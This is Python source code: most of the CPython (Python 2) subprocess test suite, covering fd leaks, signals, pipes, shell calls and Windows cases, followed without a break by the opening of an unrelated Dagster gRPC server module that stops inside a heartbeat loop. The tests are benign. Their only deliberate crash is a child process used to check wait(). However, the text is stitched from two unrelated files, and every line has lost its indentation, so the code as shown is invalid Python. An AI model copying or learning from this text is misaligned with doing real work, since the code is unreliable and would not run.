# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
# Windows raises IOError. Others raise OSError.
with self.assertRaises(EnvironmentError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen(["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate("x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
time.sleep(2)
p.communicate("x" * 2**20)
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
# context manager
class _SuppressCoreFiles(object):
"""Try to prevent core files from being created."""
old_limit = None
def __enter__(self):
"""Try to save previous ulimit, then set it to (0, 0)."""
if resource is not None:
try:
self.old_limit = resource.getrlimit(resource.RLIMIT_CORE)
resource.setrlimit(resource.RLIMIT_CORE, (0, 0))
except (ValueError, resource.error):
pass
if sys.platform == 'darwin':
# Check if the 'Crash Reporter' on OSX was configured
# in 'Developer' mode and warn that it will get triggered
# when it is.
#
# This assumes that this context manager is used in tests
# that might trigger the next manager.
value = subprocess.Popen(['/usr/bin/defaults', 'read',
'com.apple.CrashReporter', 'DialogType'],
stdout=subprocess.PIPE).communicate()[0]
if value.strip() == b'developer':
print "this tests triggers the Crash Reporter, that is intentional"
sys.stdout.flush()
def __exit__(self, *args):
"""Return core file behavior to default."""
if self.old_limit is None:
return
if resource is not None:
try:
resource.setrlimit(resource.RLIMIT_CORE, self.old_limit)
except (ValueError, resource.error):
pass
@unittest.skipUnless(hasattr(signal, 'SIGALRM'),
"Requires signal.SIGALRM")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGALRM, handler)
self.addCleanup(signal.signal, signal.SIGALRM, old_handler)
# the process is running for 2 seconds
args = [sys.executable, "-c", 'import time; time.sleep(2)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
signal.alarm(1)
# communicate() will be interrupted by SIGALRM
process.communicate()
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def test_exceptions(self):
# caught & re-raised exceptions
with self.assertRaises(OSError) as c:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd="/this/path/does/not/exist")
# The attribute child_traceback should contain "os.chdir" somewhere.
self.assertIn("os.chdir", c.exception.child_traceback)
def test_run_abort(self):
# returncode handles signal termination
with _SuppressCoreFiles():
p = subprocess.Popen([sys.executable, "-c",
"import os; os.abort()"])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_preexec(self):
# preexec function
p = subprocess.Popen([sys.executable, "-c",
"import sys, os;"
"sys.stdout.write(os.getenv('FRUIT'))"],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "apple")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(
self, args, executable, preexec_fn, close_fds, cwd, env,
universal_newlines, startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
try:
subprocess.Popen._execute_child(
self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell, to_close,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (p2cwrite, c2pread, errread))
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise RuntimeError("force the _execute_child() errpipe_data path.")
with self.assertRaises(RuntimeError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_args_string(self):
# args is a string
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), "apple")
def test_call_string(self):
# call() function with string argument on UNIX
f, fname = tempfile.mkstemp()
os.write(f, "#!/bin/sh\n")
os.write(f, "exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.close(f)
os.chmod(fname, 0700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read().strip(), sh)
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn('KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
newfds = []
for a in fds:
b = os.dup(a)
newfds.append(b)
if a == 0:
stdin = b
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = test_support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
for b, a in zip(newfds, fds):
os.dup2(b, a)
for b in newfds:
os.close(b)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = [os.dup(fd) for fd in range(3)]
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = test_support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
for std, saved in enumerate(saved_fds):
os.dup2(saved, std)
os.close(saved)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = test_support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" % stderr)
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(EnvironmentError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_pipe_cloexec(self):
# Issue 12786: check that the communication pipes' FDs are set CLOEXEC,
# and are not inherited by another child process.
p1 = subprocess.Popen([sys.executable, "-c",
'import os;'
'os.read(0, 1)'
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen([sys.executable, "-c", """if True:
import os, errno, sys
for fd in %r:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
else:
sys.exit(1)
sys.exit(0)
""" % [f.fileno() for f in (p1.stdin, p1.stdout,
p1.stderr)]
],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
p1.communicate('foo')
_, stderr = p2.communicate()
self.assertEqual(p2.returncode, 0, "Unexpected error: " + repr(stderr))
_libc_file_extensions = {
'Linux': 'so.6',
'Darwin': 'dylib',
}
@unittest.skipIf(not ctypes, 'ctypes module required.')
@unittest.skipIf(platform.uname()[0] not in _libc_file_extensions,
'Test requires a libc this code can load with ctypes.')
@unittest.skipIf(not sys.executable, 'Test requires sys.executable.')
def test_child_terminated_in_stopped_state(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
PTRACE_TRACEME = 0 # From glibc and MacOS (PT_TRACE_ME).
libc_name = 'libc.' + self._libc_file_extensions[platform.uname()[0]]
libc = ctypes.CDLL(libc_name)
if not hasattr(libc, 'ptrace'):
raise unittest.SkipTest('ptrace() required.')
test_ptrace = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
if test_ptrace.wait() != 0:
raise unittest.SkipTest('ptrace() failed - unable to test.')
child = subprocess.Popen(
[sys.executable, '-c', """if True:
import ctypes
libc = ctypes.CDLL({libc_name!r})
libc.ptrace({PTRACE_TRACEME}, 0, 0)
libc.printf(ctypes.c_char_p(0xdeadbeef)) # Crash the process.
""".format(libc_name=libc_name, PTRACE_TRACEME=PTRACE_TRACEME)
])
try:
returncode = child.wait()
except Exception as e:
child.kill() # Clean up the hung stopped process.
raise e
self.assertNotEqual(0, returncode)
self.assertLess(returncode, 0) # signal death, likely SIGSEGV.
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn("physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, '')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
@unittest.skipUnless(getattr(subprocess, '_has_poll', False),
"poll system call not supported")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
subprocess._has_poll = False
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._has_poll = True
ProcessTestCase.tearDown(self)
class HelperFunctionTests(unittest.TestCase):
@unittest.skipIf(mswindows, "errno and EINTR make no sense on windows")
def test_eintr_retry_call(self):
record_calls = []
def fake_os_func(*args):
record_calls.append(args)
if len(record_calls) == 2:
raise OSError(errno.EINTR, "fake interrupted system call")
return tuple(reversed(args))
self.assertEqual((999, 256),
subprocess._eintr_retry_call(fake_os_func, 256, 999))
self.assertEqual([(256, 999)], record_calls)
# This time there will be an EINTR so it will loop once.
self.assertEqual((666,),
subprocess._eintr_retry_call(fake_os_func, 666))
self.assertEqual([(256, 999), (666,), (666,)], record_calls)
@unittest.skipUnless(mswindows, "mswindows only")
class CommandsWithSpaces(BaseTestCase):
def setUp(self):
super(CommandsWithSpaces, self).setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super(CommandsWithSpaces, self).tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
ProcessTestCaseNoPoll,
HelperFunctionTests,
CommandsWithSpaces)
test_support.run_unittest(*unit_tests)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.errors import DagsterUserCodeUnreachableError
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instantiating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. Clients use this UUID to track when servers
# are replaced, and for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Clients tell the server to shut down by calling ShutdownServer (or by failing to send a
# heartbeat), at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which stops the server.
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception:
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
